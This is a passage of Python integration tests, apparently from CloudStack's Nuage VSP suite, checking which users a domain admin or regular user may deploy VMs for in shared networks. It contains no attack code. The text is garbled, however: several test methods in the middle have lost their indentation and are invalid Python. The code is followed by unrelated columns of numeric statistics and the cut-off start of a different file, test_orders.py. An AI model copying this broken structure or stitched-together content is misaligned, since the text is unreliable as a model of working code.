            self.fail(
                "Domain admin is able to deploy a VM for sub domain admin "
                "user in a shared network with scope=Domain no subdomain "
                "access")
        except Exception as e:
            self.debug(
                "When a admin user from a subdomain deploys a VM in a shared "
                "network with scope=domain with no subdomain access %s" % e)
            # Validate the failure is the expected ACL error.
            if not CloudstackAclException.verifyMsginException(
                    e,
                    CloudstackAclException.NOT_AVAILABLE_IN_DOMAIN):
                self.fail(
                    "Error message validation failed when Domain admin tries "
                    "to deploy a VM for sub domain admin user in a shared "
                    "network with scope=Domain and no subdomain access ")
    @attr(tags=["advanced", "nuagevsp"], required_hardware="false")
    def test_deployVM_in_sharedNetwork_as_domainadmin_nosubdomaccess_pardomusr(
            self):
        """Validate that Domain admin is NOT able to deploy a VM for parent
        domain user in a shared network with scope=Domain and no subdomain
        access
        """
        # Deploy VM as user in parentdomain of a domain that has shared network
        # with no subdomain access
        # Act as the Domain admin (D1) by switching the API client keys.
        self.api_client.connection.apiKey = self.user_d1_apikey
        self.api_client.connection.securityKey = self.user_d1_secretkey
        self.vmdata["name"] = \
            self.sharednetworkdata["vmD1A"]["name"] + \
            "-shared-scope-domain-nosubdomainaccess-domain-admin"
        self.vmdata["displayname"] = \
            self.sharednetworkdata["vmD1A"]["displayname"] + \
            "-shared-scope-domain-nosubdomainaccess-domain-admin"
        # Deployment must be rejected: D1A belongs to the parent domain, not
        # the network's own domain.
        try:
            VirtualMachine.create(
                self.api_client,
                self.vmdata,
                zoneid=self.zone.id,
                serviceofferingid=self.service_offering.id,
                templateid=self.template.id,
                networkids=self.shared_network_domain_d11.id,
                accountid=self.account_d1a.name,
                domainid=self.account_d1a.domainid
            )
            self.fail(
                "Domain admin is able to deploy a VM for parent domain user "
                "in a shared network with scope=Domain and no subdomain "
                "access")
        except Exception as e:
            self.debug(
                "When a user from parent domain deploys a VM in a shared "
                "network with scope=domain with no subdomain access %s" % e)
            # Validate the failure is the expected ACL error.
            if not CloudstackAclException.verifyMsginException(
                    e,
                    CloudstackAclException.NOT_AVAILABLE_IN_DOMAIN):
                self.fail(
                    "Error message validation failed when Domain admin tries "
                    "to deploy a VM for parent domain user in a shared "
                    "network with scope=Domain and no subdomain access ")
    @attr(tags=["advanced", "nuagevsp"], required_hardware="false")
    def test_deployVM_in_sharedNetwork_as_domainadmin_nosubdomaccess_pardomadm(
            self):
        """Validate that Domain admin is NOT able to deploy VM for parent
        domain admin user in shared network with scope=Domain and no subdomain
        access
        """
        # Deploy VM as an admin user in parentdomain of a domain that has
        # shared network with no subdomain access
        # Act as the Domain admin (D1) by switching the API client keys.
        self.api_client.connection.apiKey = self.user_d1_apikey
        self.api_client.connection.securityKey = self.user_d1_secretkey
        self.vmdata["name"] = \
            self.sharednetworkdata["vmD1"]["name"] + \
            "-shared-scope-domain-nosubdomainaccess-domain-admin"
        self.vmdata["displayname"] = \
            self.sharednetworkdata["vmD1"]["displayname"] + \
            "-shared-scope-domain-nosubdomainaccess-domain-admin"
        # Deployment must be rejected: D1 belongs to the parent domain, not
        # the network's own domain.
        try:
            VirtualMachine.create(
                self.api_client,
                self.vmdata,
                zoneid=self.zone.id,
                serviceofferingid=self.service_offering.id,
                templateid=self.template.id,
                networkids=self.shared_network_domain_d11.id,
                accountid=self.account_d1.name,
                domainid=self.account_d1.domainid
            )
            self.fail(
                "Domain admin is able to deploy VM for parent domain admin "
                "user in a shared network with scope=Domain no subdomain "
                "access")
        except Exception as e:
            self.debug(
                "When an admin user from parent domain deploys a VM in a "
                "shared network with scope=domain with no subdomain access %s"
                % e)
            # Validate the failure is the expected ACL error.
            if not CloudstackAclException.verifyMsginException(
                    e,
                    CloudstackAclException.NOT_AVAILABLE_IN_DOMAIN):
                self.fail(
                    "Error message validation failed when Domain admin tries "
                    "to deploy a VM for parent domain admin user in a shared "
                    "network with scope=Domain and no subdomain access ")
    @attr(tags=["advanced", "nuagevsp"], required_hardware="false")
    def test_deployVM_in_sharedNetwork_as_domainadmin_nosubdomaccess_ROOTuser(
            self):
        """Validate that Domain admin is NOT able to deploy a VM for user in
        ROOT domain in a shared network with scope=Domain and no subdomain
        access
        """
        # Deploy VM as user in ROOT domain
        # Act as the Domain admin (D1) by switching the API client keys.
        self.api_client.connection.apiKey = self.user_d1_apikey
        self.api_client.connection.securityKey = self.user_d1_secretkey
        self.vmdata["name"] = \
            self.sharednetworkdata["vmROOTA"]["name"] + \
            "-shared-scope-domain-nosubdomainaccess-domain-admin"
        self.vmdata["displayname"] = \
            self.sharednetworkdata["vmROOTA"]["displayname"] + \
            "-shared-scope-domain-nosubdomainaccess-domain-admin"
        # Deployment must be rejected: the ROOT account is outside the
        # network's domain and D1 cannot operate on it.
        try:
            VirtualMachine.create(
                self.api_client,
                self.vmdata,
                zoneid=self.zone.id,
                serviceofferingid=self.service_offering.id,
                templateid=self.template.id,
                networkids=self.shared_network_domain_d11.id,
                accountid=self.account_roota.name,
                domainid=self.account_roota.domainid
            )
            self.fail(
                "Domain admin is able to deploy a VM for user in ROOT domain "
                "in a shared network with scope=Domain and no subdomain "
                "access")
        except Exception as e:
            self.debug(
                "When a regular user from ROOT domain deploys a VM in a "
                "shared network with scope=domain with no subdomain access %s"
                % e)
            # This case expects a permission error (not "network unavailable")
            # because the target account is outside D1's domain tree.
            if not CloudstackAclException.verifyMsginException(
                    e,
                    CloudstackAclException.NO_PERMISSION_TO_OPERATE_DOMAIN):
                self.fail(
                    "Error message validation failed when Domain admin tries "
                    "to deploy a VM for user in ROOT domain in a shared "
                    "network with scope=Domain and no subdomain access")
    # Test cases relating to deploying Virtual Machine as Domain admin for
    # other users in shared network with scope=Domain and with subdomain access
    @attr(tags=["advanced", "nuagevsp"], required_hardware="false")
    def test_deployVM_in_sharedNetwork_as_domainadmin_subdomaccess_domainuser(
            self):
        """Validate that Domain admin is able to deploy a VM for regular user
        in domain in a shared network with scope=Domain and subdomain access
        """
        # Deploy VM as user in a domain that has shared network with subdomain
        # access
        # Act as the Domain admin (D1) by switching the API client keys.
        self.api_client.connection.apiKey = self.user_d1_apikey
        self.api_client.connection.securityKey = self.user_d1_secretkey
        self.vmdata["name"] = \
            self.sharednetworkdata["vmD11A"]["name"] + \
            "-shared-scope-domain-withsubdomainaccess-domain-admin"
        self.vmdata["displayname"] = \
            self.sharednetworkdata["vmD11A"]["displayname"] + \
            "-shared-scope-domain-withsubdomainaccess-domain-admin"
        # Expected to succeed: account D11A is in the network's own domain.
        vm = self.create_VM(self.shared_network_domain_with_subdomain_d11,
                            testdata=self.vmdata, account=self.account_d11a,
                            cleanup=False)
        self.assertEqual(
            vm.state == "Running" and vm.account == self.account_d11a.name and
            vm.domainid == self.account_d11a.domainid,
            True,
            "Domain admin is not able to deploy VM for regular user in domain "
            "in a shared network with scope=Domain subdomain access")
        # Cross-check the shared network and the VM on the Nuage VSD side.
        self.verify_vsd_shared_network(
            self.account_d11a.domainid,
            self.shared_network_domain_with_subdomain_d11,
            gateway=self.nuagenetworkdata[
                "network_domain_with_subdomain_access"]["gateway"])
        subnet_id = self.get_subnet_id(
            self.shared_network_domain_with_subdomain_d11.id,
            self.nuagenetworkdata[
                "network_domain_with_subdomain_access"]["gateway"])
        self.verify_vsd_enterprise_vm(
            self.account_d11a.domainid,
            self.shared_network_domain_with_subdomain_d11,
            vm, sharedsubnetid=subnet_id)
        # Deleting the VM
        vm.delete(self.api_client, expunge=True)
    @attr(tags=["advanced", "nuagevsp"], required_hardware="false")
    def test_deployVM_in_sharedNetwork_as_domainadmin_subdomaccess_domainadmin(
            self):
        """Validate that Domain admin is able to deploy a VM for admin user in
        domain in a shared network with scope=Domain and subdomain access
        """
        # Deploy VM as an admin user in a domain that has shared network with
        # subdomain access
        # Act as the Domain admin (D1) by switching the API client keys.
        self.api_client.connection.apiKey = self.user_d1_apikey
        self.api_client.connection.securityKey = self.user_d1_secretkey
        self.vmdata["name"] = \
            self.sharednetworkdata["vmD11"]["name"] + \
            "-shared-scope-domain-withsubdomainaccess-domain-admin"
        self.vmdata["displayname"] = \
            self.sharednetworkdata["vmD11"]["displayname"] + \
            "-shared-scope-domain-withsubdomainaccess-domain-admin"
        # Expected to succeed: account D11 is in the network's own domain.
        vm = self.create_VM(self.shared_network_domain_with_subdomain_d11,
                            testdata=self.vmdata, account=self.account_d11,
                            cleanup=False)
        self.assertEqual(
            vm.state == "Running" and vm.account == self.account_d11.name and
            vm.domainid == self.account_d11.domainid,
            True,
            "Domain admin is not able to deploy a VM for admin user in domain "
            "in a shared network with scope=Domain subdomain access")
        # Cross-check the shared network and the VM on the Nuage VSD side.
        self.verify_vsd_shared_network(
            self.account_d11.domainid,
            self.shared_network_domain_with_subdomain_d11,
            gateway=self.nuagenetworkdata[
                "network_domain_with_subdomain_access"]["gateway"])
        subnet_id = self.get_subnet_id(
            self.shared_network_domain_with_subdomain_d11.id,
            self.nuagenetworkdata[
                "network_domain_with_subdomain_access"]["gateway"])
        self.verify_vsd_enterprise_vm(
            self.account_d11.domainid,
            self.shared_network_domain_with_subdomain_d11,
            vm, sharedsubnetid=subnet_id)
        # Deleting the VM
        vm.delete(self.api_client, expunge=True)
    @attr(tags=["advanced", "nuagevsp"], required_hardware="false")
    def test_deployVM_in_sharedNetwork_as_domainadmin_subdomaccess_subdomuser(
            self):
        """Validate that Domain admin is able to deploy a VM for regular user
        in subdomain in a shared network with scope=Domain and subdomain access
        """
        # Deploy VM as user in a subdomain under a domain that has shared
        # network with subdomain access
        # Act as the Domain admin (D1) by switching the API client keys.
        self.api_client.connection.apiKey = self.user_d1_apikey
        self.api_client.connection.securityKey = self.user_d1_secretkey
        self.vmdata["name"] = \
            self.sharednetworkdata["vmD111A"]["name"] + \
            "-shared-scope-domain-withsubdomainaccess-domain-admin"
        self.vmdata["displayname"] = \
            self.sharednetworkdata["vmD111A"]["displayname"] + \
            "-shared-scope-domain-withsubdomainaccess-domain-admin"
        # Expected to succeed: the network allows subdomain access, so the
        # subdomain account D111A may use it.
        vm = self.create_VM(self.shared_network_domain_with_subdomain_d11,
                            testdata=self.vmdata, account=self.account_d111a,
                            cleanup=False)
        self.assertEqual(
            vm.state == "Running" and vm.account == self.account_d111a.name and
            vm.domainid == self.account_d111a.domainid,
            True,
            "Domain admin not able to deploy VM for regular user in subdomain "
            "in shared network with scope=Domain subdomain access")
        # Cross-check the shared network and the VM on the Nuage VSD side.
        self.verify_vsd_shared_network(
            self.account_d111a.domainid,
            self.shared_network_domain_with_subdomain_d11,
            gateway=self.nuagenetworkdata[
                "network_domain_with_subdomain_access"]["gateway"])
        subnet_id = self.get_subnet_id(
            self.shared_network_domain_with_subdomain_d11.id,
            self.nuagenetworkdata[
                "network_domain_with_subdomain_access"]["gateway"])
        self.verify_vsd_enterprise_vm(
            self.account_d111a.domainid,
            self.shared_network_domain_with_subdomain_d11,
            vm, sharedsubnetid=subnet_id)
        # Deleting the VM
        vm.delete(self.api_client, expunge=True)
    @attr(tags=["advanced", "nuagevsp"], required_hardware="false")
    def test_deployVM_in_sharedNetwork_as_domainadmin_subdomaccess_subdomadmin(
            self):
        """Validate that Domain admin is able to deploy a VM for admin user in
        subdomain in a shared network with scope=Domain and subdomain access
        """
        # Deploy VM as an admin user in a subdomain under a domain that has
        # shared network with subdomain access
        # Act as the Domain admin (D1) by switching the API client keys.
        self.api_client.connection.apiKey = self.user_d1_apikey
        self.api_client.connection.securityKey = self.user_d1_secretkey
        self.vmdata["name"] = \
            self.sharednetworkdata["vmD111"]["name"] + \
            "-shared-scope-domain-withsubdomainaccess-domain-admin"
        self.vmdata["displayname"] = \
            self.sharednetworkdata["vmD111"]["displayname"] + \
            "-shared-scope-domain-withsubdomainaccess-domain-admin"
        # Expected to succeed: the network allows subdomain access, so the
        # subdomain account D111 may use it.
        vm = self.create_VM(self.shared_network_domain_with_subdomain_d11,
                            testdata=self.vmdata, account=self.account_d111,
                            cleanup=False)
        self.assertEqual(
            vm.state == "Running" and vm.account == self.account_d111.name and
            vm.domainid == self.account_d111.domainid,
            True,
            "Domain admin is not able to deploy VM for admin user in "
            "subdomain in a shared network with scope=Domain subdomain access")
        # Cross-check the shared network and the VM on the Nuage VSD side.
        self.verify_vsd_shared_network(
            self.account_d111.domainid,
            self.shared_network_domain_with_subdomain_d11,
            gateway=self.nuagenetworkdata[
                "network_domain_with_subdomain_access"]["gateway"])
        subnet_id = self.get_subnet_id(
            self.shared_network_domain_with_subdomain_d11.id,
            self.nuagenetworkdata[
                "network_domain_with_subdomain_access"]["gateway"])
        self.verify_vsd_enterprise_vm(
            self.account_d111.domainid,
            self.shared_network_domain_with_subdomain_d11,
            vm, sharedsubnetid=subnet_id)
        # Deleting the VM
        vm.delete(self.api_client, expunge=True)
    @attr(tags=["advanced", "nuagevsp"], required_hardware="false")
    def test_deployVM_in_sharedNetwork_as_domainadmin_subdomaccess_pardomuser(
            self):
        """Validate that Domain admin NOT able to deploy VM for regular user in
        parent domain in shared network with scope=Domain subdomain access
        """
        # Deploy VM as user in parentdomain of a domain that has shared network
        # with subdomain access
        # Act as the Domain admin (D1) by switching the API client keys.
        self.api_client.connection.apiKey = self.user_d1_apikey
        self.api_client.connection.securityKey = self.user_d1_secretkey
        self.vmdata["name"] = \
            self.sharednetworkdata["vmD1A"]["name"] + \
            "-shared-scope-domain-withsubdomainaccess-domain-admin"
        self.vmdata["displayname"] = \
            self.sharednetworkdata["vmD1A"]["displayname"] + \
            "-shared-scope-domain-withsubdomainaccess-domain-admin"
        # Deployment must be rejected: subdomain access extends downwards
        # only, never to the parent domain account D1A.
        try:
            VirtualMachine.create(
                self.api_client,
                self.vmdata,
                zoneid=self.zone.id,
                serviceofferingid=self.service_offering.id,
                templateid=self.template.id,
                networkids=self.shared_network_domain_with_subdomain_d11.id,
                accountid=self.account_d1a.name,
                domainid=self.account_d1a.domainid
            )
            self.fail(
                " Domain admin is able to deploy VM for regular user in "
                "parent domain in a shared network with scope=Domain "
                "subdomain access")
        except Exception as e:
            self.debug(
                "When a user from parent domain deploys a VM in a shared "
                "network with scope=domain with subdomain access %s" % e)
            # Validate the failure is the expected ACL error.
            if not CloudstackAclException.verifyMsginException(
                    e,
                    CloudstackAclException.NOT_AVAILABLE_IN_DOMAIN):
                self.fail(
                    "Error message validation failed when Domain admin tries "
                    "to deploy a VM for regular user in parent domain in a "
                    "shared network with scope=Domain and subdomain access")
    @attr(tags=["advanced", "nuagevsp"], required_hardware="false")
    def test_deployVM_in_sharedNetwork_as_domainadmin_subdomaccess_pardomadmin(
            self):
        """Validate that Domain admin is NOT able to deploy VM for admin user
        in parent domain in shared network with scope=Domain subdomain access
        """
        # Deploy VM as an admin user in parentdomain of a domain that has
        # shared network with subdomain access
        # Act as the Domain admin (D1) by switching the API client keys.
        self.api_client.connection.apiKey = self.user_d1_apikey
        self.api_client.connection.securityKey = self.user_d1_secretkey
        self.vmdata["name"] = \
            self.sharednetworkdata["vmD1"]["name"] + \
            "-shared-scope-domain-withsubdomainaccess-domain-admin"
        self.vmdata["displayname"] = \
            self.sharednetworkdata["vmD1"]["displayname"] + \
            "-shared-scope-domain-withsubdomainaccess-domain-admin"
        # Deployment must be rejected: subdomain access extends downwards
        # only, never to the parent domain account D1.
        try:
            VirtualMachine.create(
                self.api_client,
                self.vmdata,
                zoneid=self.zone.id,
                serviceofferingid=self.service_offering.id,
                templateid=self.template.id,
                networkids=self.shared_network_domain_with_subdomain_d11.id,
                accountid=self.account_d1.name,
                domainid=self.account_d1.domainid
            )
            self.fail(
                "Domain admin is able to deploy a VM for admin user in parent "
                "domain in a shared network with scope=Domain subdomain "
                "access")
        except Exception as e:
            self.debug(
                "When an admin user from parent domain deploys a VM in a "
                "shared network with scope=domain with subdomain access %s" %
                e)
            # Validate the failure is the expected ACL error.
            if not CloudstackAclException.verifyMsginException(
                    e,
                    CloudstackAclException.NOT_AVAILABLE_IN_DOMAIN):
                self.fail(
                    "Error message validation failed when Domain admin tries "
                    "to deploy a VM for admin user in parent domain in a "
                    "shared network with scope=Domain and subdomain access")
    @attr(tags=["advanced", "nuagevsp"], required_hardware="false")
    def test_deployVM_in_sharedNetwork_as_domainadmin_subdomainaccess_ROOTuser(
            self):
        """Validate that Domain admin is NOT able to deploy a VM for user in
        ROOT domain in a shared network with scope=Domain and subdomain access
        """
        # Deploy VM as user in ROOT domain
        # Act as the Domain admin (D1) by switching the API client keys.
        self.api_client.connection.apiKey = self.user_d1_apikey
        self.api_client.connection.securityKey = self.user_d1_secretkey
        self.vmdata["name"] = \
            self.sharednetworkdata["vmROOTA"]["name"] + \
            "-shared-scope-domain-withsubdomainaccess-domain-admin"
        self.vmdata["displayname"] = \
            self.sharednetworkdata["vmROOTA"]["displayname"] + \
            "-shared-scope-domain-withsubdomainaccess-domain-admin"
        # Deployment must be rejected: the ROOT account is outside the
        # network's domain tree and D1 cannot operate on it.
        try:
            VirtualMachine.create(
                self.api_client,
                self.vmdata,
                zoneid=self.zone.id,
                serviceofferingid=self.service_offering.id,
                templateid=self.template.id,
                networkids=self.shared_network_domain_with_subdomain_d11.id,
                accountid=self.account_roota.name,
                domainid=self.account_roota.domainid
            )
            self.fail(
                "Domain admin is able to deploy a VM for user in ROOT domain "
                "in a shared network with scope=Domain and subdomain access")
        except Exception as e:
            self.debug(
                "When a user from ROOT domain deploys a VM in a shared "
                "network with scope=domain with subdomain access %s" % e)
            # This case expects a permission error because the target account
            # is outside D1's domain tree.
            if not CloudstackAclException.verifyMsginException(
                    e,
                    CloudstackAclException.NO_PERMISSION_TO_OPERATE_DOMAIN):
                self.fail(
                    "Error message validation failed when Domain admin tries "
                    "to deploy a VM for user in ROOT domain in a shared "
                    "network with scope=Domain and subdomain access")
# Test cases relating to deploying Virtual Machine as Domain admin for
# other users in shared network with scope=account
@attr(tags=["advanced", "nuagevsp"], required_hardware="false")
def test_deployVM_in_sharedNetwork_as_domainadmin_scope_account_domainuser(
self):
"""Validate that Domain admin is NOT able to deploy a VM for user in
the same domain but belonging to a different account in a shared
network with scope=account
"""
# Deploy VM as user in a domain under the same domain but different
# account from the acount that has a shared network with scope=account
self.api_client.connection.apiKey = self.user_d1_apikey
self.api_client.connection.securityKey = self.user_d1_secretkey
self.vmdata["name"] = \
self.sharednetworkdata["vmD111B"]["name"] + \
"-shared-scope-domain-withsubdomainaccess-domain-admin"
self.vmdata["displayname"] = \
self.sharednetworkdata["vmD111B"]["displayname"] + \
"-shared-scope-domain-withsubdomainaccess-domain-admin"
try:
VirtualMachine.create(
self.api_client,
self.vmdata,
zoneid=self.zone.id,
serviceofferingid=self.service_offering.id,
templateid=self.template.id,
networkids=self.shared_network_account_d111a.id,
accountid=self.account_d111b.name,
domainid=self.account_d111b.domainid
)
self.fail(
"Domain admin is able to deploy a VM for user in the same "
"domain but belonging to a different account in a shared "
"network with scope=account")
except Exception as e:
self.debug(
"When a user from same domain but different account deploys a "
"VM in a shared network with scope=account %s" % e)
if not CloudstackAclException.verifyMsginException(
e,
CloudstackAclException.UNABLE_TO_USE_NETWORK):
self.fail(
"Error message validation failed when Domain admin tries "
"to deploy a VM for user in the same domain but belonging "
"to a different account in a shared network with "
"scope=account")
@attr(tags=["advanced", "nuagevsp"], required_hardware="false")
def test_deployVM_in_sharedNetwork_as_domainadmin_scope_account_domadmin(
self):
"""Validate that Domain admin is NOT able to deploy a VM for an admin
user in the same domain but belonging to a different account in a
shared network with scope=account
"""
# Deploy VM as admin user for a domain that has an account with shared
# network with scope=account
self.api_client.connection.apiKey = self.user_d1_apikey
self.api_client.connection.securityKey = self.user_d1_secretkey
self.vmdata["name"] = \
self.sharednetworkdata["vmD111"]["name"] + \
"-shared-scope-domain-withsubdomainaccess-domain-admin"
self.vmdata["displayname"] = \
self.sharednetworkdata["vmD111"]["displayname"] + \
"-shared-scope-domain-withsubdomainaccess-domain-admin"
try:
VirtualMachine.create(
self.api_client,
self.vmdata,
zoneid=self.zone.id,
serviceofferingid=self.service_offering.id,
templateid=self.template.id,
networkids=self.shared_network_account_d111a.id,
accountid=self.account_d111.name,
domainid=self.account_d111.domainid
)
self.fail(
"Domain admin is able to deploy a VM for user in the same "
"domain but belonging to a different account in a shared "
"network with scope=account")
except Exception as e:
self.debug(
"When a user from same domain but different account deploys a "
"VM in a shared network with scope=account %s" % e)
if not CloudstackAclException.verifyMsginException(
e,
CloudstackAclException.UNABLE_TO_USE_NETWORK):
self.fail(
"Error message validation failed when Domain admin tries "
"to deploy a VM for user in the same domain but belonging "
"to a different account in a shared network with "
"scope=account")
@attr(tags=["advanced", "nuagevsp"], required_hardware="false")
def test_deployVM_in_sharedNetwork_as_domainadmin_scope_account_user(self):
"""Validate that Domain admin is able to deploy a VM for an regular
user in a shared network with scope=account
"""
# Deploy VM as account with shared network with scope=account
self.api_client.connection.apiKey = self.user_d1_apikey
self.api_client.connection.securityKey = self.user_d1_secretkey
self.vmdata["name"] = \
self.sharednetworkdata["vmD111A"]["name"] + \
"-shared-scope-domain-withsubdomainaccess-domain-admin"
self.vmdata["displayname"] = \
self.sharednetworkdata["vmD111A"]["displayname"] + \
"-shared-scope-domain-withsubdomainaccess-domain-admin"
vm = self.create_VM(self.shared_network_account_d111a,
testdata=self.vmdata, account=self.account_d111a,
cleanup=False)
self.assertEqual(
vm.state == "Running" and vm.account == self.account_d111a.name and
vm.domainid == self.account_d111a.domainid,
True,
"Domain admin is not able to deploy a VM for an regular user in a "
"shared network with scope=account")
self.verify_vsd_shared_network(self.account_d111a.domainid,
self.shared_network_account_d111a,
gateway=self.nuagenetworkdata[
"network_account"]["gateway"])
subnet_id = self.get_subnet_id(self.shared_network_account_d111a.id,
self.nuagenetworkdata[
"network_account"]["gateway"])
self.verify_vsd_enterprise_vm(self.account_d111a.domainid,
self.shared_network_account_d111a, vm,
sharedsubnetid=subnet_id)
@attr(tags=["advanced", "nuagevsp"], required_hardware="false")
def test_deployVM_in_sharedNetwork_as_domainadmin_scope_account_diffdomain(
self):
"""Validate that Domain admin is NOT able to deploy a VM for an
regular user from a different domain in a shared network with
scope=account
"""
# Deploy VM as an admin user in a subdomain under ROOT
self.api_client.connection.apiKey = self.user_d1_apikey
self.api_client.connection.securityKey = self.user_d1_secretkey
self.vmdata["name"] = \
self.sharednetworkdata["vmD2A"]["name"] + \
"-shared-scope-account-domain-admin"
self.vmdata["displayname"] = \
self.sharednetworkdata["vmD2A"]["displayname"] + \
"-shared-scope-account-domain-admin"
try:
VirtualMachine.create(
self.api_client,
self.vmdata,
zoneid=self.zone.id,
serviceofferingid=self.service_offering.id,
templateid=self.template.id,
networkids=self.shared_network_account_d111a.id,
accountid=self.account_d2a.name,
domainid=self.account_d2a.domainid
)
self.fail(
"Domain admin is able able to deploy a VM for an regular user "
"from a differnt domain in a shared network with "
"scope=account")
except Exception as e:
self.debug(
"When a user from different domain deploys a VM in a shared "
"network with scope=account %s" % e)
if not CloudstackAclException.verifyMsginException(
e,
CloudstackAclException.NO_PERMISSION_TO_OPERATE_DOMAIN):
self.fail(
"Error message validation failed when Domain admin tries "
"to deploy a VM for an regular user from a differnt "
"domain in a shared network with scope=account")
    @attr(tags=["advanced", "nuagevsp"], required_hardware="false")
    def test_deployVM_in_sharedNetwork_as_domainadmin_scope_account_ROOTuser(
            self):
        """Validate that Domain admin is NOT able to deploy a VM for an regular
        user in ROOT domain in a shared network with scope=account
        """
        # Deploy VM as user in ROOT domain
        # Act as the Domain admin (D1) by switching the API client keys.
        self.api_client.connection.apiKey = self.user_d1_apikey
        self.api_client.connection.securityKey = self.user_d1_secretkey
        self.vmdata["name"] = \
            self.sharednetworkdata["vmROOTA"]["name"] + \
            "-shared-scope-account-domain-admin"
        self.vmdata["displayname"] = \
            self.sharednetworkdata["vmROOTA"]["displayname"] + \
            "-shared-scope-account-domain-admin"
        # Deployment must be rejected: the ROOT account is outside D1's
        # domain tree and does not own the scope=account network.
        try:
            VirtualMachine.create(
                self.api_client,
                self.vmdata,
                zoneid=self.zone.id,
                serviceofferingid=self.service_offering.id,
                templateid=self.template.id,
                networkids=self.shared_network_account_d111a.id,
                accountid=self.account_roota.name,
                domainid=self.account_roota.domainid
            )
            self.fail(
                "Domain admin is able to deploy a VM for an regular user in "
                "ROOT domain in a shared network with scope=account")
        except Exception as e:
            self.debug(
                "When a user from ROOT domain deploys a VM in a shared "
                "network with scope=account %s" % e)
            # Validate the failure is the expected ACL error.
            if not CloudstackAclException.verifyMsginException(
                    e,
                    CloudstackAclException.NO_PERMISSION_TO_OPERATE_DOMAIN):
                self.fail(
                    "Error message validation failed when Domain admin tries "
                    "to deploy a VM for an regular user in ROOT domain in a "
                    "shared network with scope=account")
    # Test cases relating to deploying Virtual Machine as Regular user for
    # other users in shared network with scope=all
    @attr(tags=["advanced", "nuagevsp"], required_hardware="false")
    def test_deployVM_in_sharedNetwork_as_regularuser_scope_all_anotherusers(
            self):
        """Validate that regular user is NOT able to deploy a VM for
        another user in the same domain in a shared network with scope=all
        """
        # Deploy VM for a user in a domain under ROOT as admin
        # Act as the regular user D11A by switching the API client keys.
        self.api_client.connection.apiKey = self.user_d11a_apikey
        self.api_client.connection.securityKey = self.user_d11a_secretkey
        # NOTE(review): the "-domain-admin" suffix looks copy-pasted from the
        # domain-admin test group even though the actor here is a regular
        # user — confirm whether the naming is intentional.
        self.vmdata["name"] = \
            self.sharednetworkdata["vmD11A"]["name"] + \
            "-shared-scope-all-domain-admin"
        self.vmdata["displayname"] = \
            self.sharednetworkdata["vmD11A"]["displayname"] + \
            "-shared-scope-all-domain-admin"
        # Deployment must be rejected: a regular user cannot deploy on
        # behalf of a different account (D12A).
        try:
            VirtualMachine.create(
                self.api_client,
                self.vmdata,
                zoneid=self.zone.id,
                serviceofferingid=self.service_offering.id,
                templateid=self.template.id,
                networkids=self.shared_network_all.id,
                accountid=self.account_d12a.name,
                domainid=self.account_d12a.domainid
            )
            self.fail(
                "Regular user is allowed to deploy a VM for another user in "
                "the same domain in a shared network with scope=all")
        except Exception as e:
            self.debug(
                "When a regular user deploys a VM for another user in the "
                "same domain in a shared network with scope=all %s" % e)
            # Validate the failure is the expected ACL error.
            if not CloudstackAclException.verifyMsginException(
                    e,
                    CloudstackAclException.NO_PERMISSION_TO_OPERATE_ACCOUNT):
                self.fail(
                    "Error message validation failed when Regular user tries "
                    "to deploy a VM for another user in the same domain in a "
                    "shared network with scope=all")
@attr(tags=["advanced", "nuagevsp"], required_hardware="false")
def test_deployVM_in_sharedNetwork_as_regularuser_scope_all_crossdomain(
self):
"""Validate that regular user is NOT able to deploy a VM for
another user in a different domain in a shared network with scope=all
"""
# Deploy VM for a user in a domain under ROOT as admin
self.api_client.connection.apiKey = self.user_d11a_apikey
self.api_client.connection.securityKey = self.user_d11a_secretkey
self.vmdata["name"] = self.sharednetworkdata["vmD11A"][
"name"] + "-shared-scope-all-domain-admin"
self.vmdata["displayname"] = \
self.sharednetworkdata["vmD11A"]["displayname"] + \
"-shared-scope-all-domain-admin"
try:
VirtualMachine.create(
self.api_client,
self.vmdata,
zoneid=self.zone.id,
serviceofferingid=self.service_offering.id,
templateid=self.template.id,
networkids=self.shared_network_all.id,
accountid=self.account_d2a.name,
domainid=self.account_d2a.domainid
)
self.fail(
"Regular user is allowed to deploy a VM for another user in "
"the same domain in a shared network with scope=all")
except Exception as e:
self.debug(
"When a regular user deploys a VM for another user in the "
"same domain in a shared network with scope=all %s" % e)
if not CloudstackAclException.verifyMsginException(
e,
CloudstackAclException.NO_PERMISSION_TO_OPERATE_ACCOUNT):
self.fail(
"Error message validation failed when Regular user tries "
"to deploy a VM for another user in the same domain in a "
"shared network with scope=all")
@staticmethod
def generateKeysForUser(api_client, account):
user = User.list(
api_client,
account=account.name,
domainid=account.domainid
)[0]
return (User.registerUserKeys(
api_client,
user.id
))
| 46.880047
| 79
| 0.605426
| 13,282
| 120,763
| 5.34927
| 0.026803
| 0.065504
| 0.046897
| 0.05264
| 0.947276
| 0.936227
| 0.932948
| 0.915523
| 0.910527
| 0.90287
| 0
| 0.01124
| 0.316339
| 120,763
| 2,575
| 80
| 46.898252
| 0.849324
| 0.116451
| 0
| 0.818182
| 0
| 0
| 0.219879
| 0.052113
| 0
| 0
| 0
| 0
| 0.011426
| 1
| 0.027819
| false
| 0
| 0.003477
| 0
| 0.03378
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f4bdbb7ac27cd945444d15baab470c3009c35898
| 3,498
|
py
|
Python
|
test/views/test_orders.py
|
brunocamposal/fast-food-simulator
|
6dc7f33cdebd222998fc88df9264853c741c64ca
|
[
"MIT"
] | 2
|
2021-01-11T23:47:17.000Z
|
2021-01-13T13:16:50.000Z
|
test/views/test_orders.py
|
brunocamposal/kitchin-kanri
|
6dc7f33cdebd222998fc88df9264853c741c64ca
|
[
"MIT"
] | 7
|
2021-01-13T13:16:46.000Z
|
2021-01-21T16:07:28.000Z
|
test/views/test_orders.py
|
brunocamposal/kitchin-kanri
|
6dc7f33cdebd222998fc88df9264853c741c64ca
|
[
"MIT"
] | null | null | null |
from test import app
import json
# NOTE(review): the entire test body lives inside the docstring below, so
# this test is effectively disabled and always passes without exercising
# the /orders endpoint. Consider pytest.mark.skip instead of commenting out.
def test_Order_GET_request(app):
    """with app.test_client() as client:
    response = client.get('/orders')
    data = json.loads(response.data.decode())
    assert data == {'data':
    [
    {'date': '2021-01-18T13:19:43', 'id': 2, 'payment_method': 'dinheiro', 'products': [], 'status': 'Pedido em andamento', 'total_price': 0.0},
